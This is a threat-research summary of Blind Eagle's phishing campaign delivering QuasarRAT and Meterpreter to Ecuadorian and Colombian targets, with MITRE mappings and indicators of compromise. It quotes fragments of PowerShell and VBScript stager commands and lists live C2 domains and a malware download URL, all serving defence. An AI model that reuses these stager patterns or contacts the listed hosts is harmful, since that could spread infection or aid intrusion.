Threat Research

BlindEagle Targeting Ecuador With Sharpened Tools – Check Point Research

Securonix

Blind Eagle (APT-C-36) has intensified its Ecuador-focused campaign with an upgraded infection chain, delivering a QuasarRAT-based payload via a password‑protected LHA package and multiple stages. The operation combines geo-filtered phishing, a MediaFire drop, and living-off-the-land techniques (mshta) to evade analysis and target financial institutions in Latin America.
#BlindEagle #QuasarRAT #upxsystems #MediaFire #Mshta #PowerShell #Python

Keypoints

  • Blind Eagle is a financially motivated APT (APT-C-36) expanding its operations in South America, including a new Ecuador-focused campaign.
  • The group uses phishing emails that impersonate government entities, sometimes combining a malicious link with an attached PDF.
  • Victims are geo-filtered via a shortened URL; non-Colombian origins are redirected to innocuous government sites, while Colombian-origin requests proceed to infection.
  • The infection chain in Colombia leads to a MediaFire-hosted, password-protected LHA payload containing a .Net/QuasarRAT executable.
  • QuasarRAT is customized by the actors (Spanish-named functions) and is used to intercept banking activity; several Latin American banks are targeted.
  • In an Ecuador-specific case, the chain uses mshta to download and execute VBScript/HTML code, then PowerShell and Python-based stages, with persistence via scheduled tasks.
  • The attack chain includes multiple C2 elements (systemwin.linkpc.net, laminascol.linkpc.net, upxsystems.com) and multiple obfuscated payloads (mp.py, ByAV2.py, InMemoryMeterpreter).

MITRE Techniques

  • [T1566.001] Phishing – Initial access via targeted emails purporting government affiliation, sometimes with both a link and an attachment. Quote: “phishing emails pretending to be from the Colombian government. One typical example is an email purportedly from the Ministry of Foreign Affairs…”
  • [T1105] Ingress Tool Transfer – Downloading and delivering the malware executable from a file-sharing service (MediaFire). Quote: “The server responds to the client with a file for download. This is a malware executable hosted on the file-sharing service MediaFire.”
  • [T1027] Obfuscated/Compressed Files or Information – Password-protected LHA archives and obfuscated scripts to hinder analysis. Quote: “The file is compressed, similar to a ZIP file, using the LHA algorithm. It is password-protected…”
  • [T1218.005] Mshta – Abuse of the MSHTA utility to download and execute the next stage, with embedded VBScript/HTML. Quote: “mshta is a utility that executes Microsoft HTML Applications, and the attackers abuse it here to download and execute the next stage, which contains VBS code embedded in an HTML.”
  • [T1059.005] VBScript – VBScript content delivered via HTML stage used by the dropper. Quote: ” CreateObject(“Wscript.Shell”).run…IEX(-join $a3)””
  • [T1059.001] PowerShell – OS/version-specific PowerShell stagers that download and execute further scripts. Quote: “powershell.exe -noexit “…IEX(-join $a3)”
  • [T1059.006] Python – A Python-based infection stage (PyInstaller-built), including a loader and two Python scripts. Quote: “import os import subprocess import ctypes” and “StartA” PowerShell script selects and runs Python components.
  • [T1053.005] Scheduled Task – Persistence by creating a scheduled task to run every 10 minutes. Quote: “…a scheduled task that will run every 10 minutes.”
  • [T1562.001] Impair Defenses – Attempts to disable security tools and processes during infection. Quote: “The malware will try to kill all processes related to the infection.”
  • [T1071.001] Web Protocols – C2 communications over web protocols (e.g., tcp://systemwin.linkpc.net:443). Quote: “a normal Meterpreter sample in DLL format that uses ‘tcp://systemwin.linkpc.net:443’ as a C2 server.”

Indicators of Compromise

  • [Domain] gtly.to/QvlFV_zgh – Dropper domain used for geolocation redirect. Context: geolocated infection control.
  • [Domain] gtly.to/cuOv3gNDi – Dropper domain. Context: geolocation redirect.
  • [Domain] gtly.to/dGBeBqd8z – Dropper domain (Py2EXE). Context: geolocation redirect.
  • [Domain] laminascol.linkpc.net – QuasarRAT C2. Context: C2 for QuasarRAT payload.
  • [Domain] systemwin.linkpc.net – Meterpreter C2. Context: C2 for Meterpreter stage.
  • [Domain] upxsystems.com – Ecuador mid-infection C2. Context: C2 hosting additional payloads.
  • [URL] https://www.mediafire.com/file/cfnw8rwufptk5jz/migracioncolombiaprocesopendienteid2036521045875referenciawwwmigraciongovco.LHA/file – LHA download link. Context: primary dropper.
  • [File hash] 8e864940a97206705b29e645a2c2402c2192858357205213567838443572f564 – EML Colombia
  • [File hash] 2702ea04dcbbbc3341eeffb494b692e15a50fbd264b1d676b56242aae3dd9001 – PDF Colombia
  • [File hash] f80eb2fcefb648f5449c618e83c4261f977b18b979aacac2b318a47e99c19f64 – PDF Colombia
  • [File hash] 68af317ffde8639edf2562481912161cf398f0edba6e06745d90c1359554c76e – LHA (zip file)
  • [File hash] 61685ea4dc4ca4d01e0513d5e23ee04fc9758d6b189325b34d5b16da254cc9f4 – EXE
  • [Hash] c63d15fe69a76186e4049960337d8c04c6230e4c2d3d3164d3531674f5f74cdf – wins (inicio0)
  • [Hash] 353406209dea860decac0363d590096e2a8717dd37d6b4d8b0272b02ad82472e – wins (PowerShell)
  • [Hash] a03259900d4b095d7494944c50d24115c99c54f3c930bea08a43a8f0a1da5a2e – 0 (Windows 10 PowerShell)
  • [Hash] 46addee80c4c882b8a6903cced9b6c0130ec327ae8a59c5946bb954ccea64a12 – 0 (Windows 8 PowerShell)
  • [Hash] c067869ac346d007a17e2e91c1e04ca0f980e8e9c4fd5c7baa0cb0cc2398fe59 – 0 (Windows 7 PowerShell)
  • [Hash] 10fd1b81c5774c1cc6c00cc06b3ed181b2d78191c58b8e9b54fa302e4990b13d – ByAV2.py
  • [Hash] c4ff3fb6a02ca0e51464b1ba161c0a7387b405c78ead528a645d08ad3e696b12 – mp.py
  • [Hash] ac1ea54f35fe9107af1aef370e4de4dc504c8523ddaae10d95beae5a3bf67716 – InMemoryMeterpreter

Read more: https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint